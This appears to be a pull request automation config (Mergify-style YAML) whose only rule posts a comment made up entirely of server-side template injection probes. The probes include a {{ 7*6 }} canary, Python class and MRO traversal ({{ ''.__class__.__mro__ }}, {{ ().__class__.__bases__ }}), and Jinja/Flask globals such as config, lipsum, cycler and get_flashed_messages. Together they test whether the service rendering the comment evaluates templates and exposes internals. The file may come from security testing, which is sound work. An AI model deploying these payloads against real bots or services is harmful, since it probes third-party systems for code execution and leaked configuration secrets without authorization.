pull_request_rules:
  - name: tmpl-probe
    conditions:
      - base=main
    actions:
      comment:
        message: |
          TMPL-PROBE-91X
          A={{ 7*6 }}
          B={{ author }}
          C={{ ''.__class__ }}
          D={{ self }}
          E={{ config }}
          F={{ ''.__class__.__mro__ }}
          G={{ lipsum }}
          H={{ cycler }}
          I={{ namespace }}
          J={{ get_flashed_messages }}
          K={{ ().__class__.__bases__ }}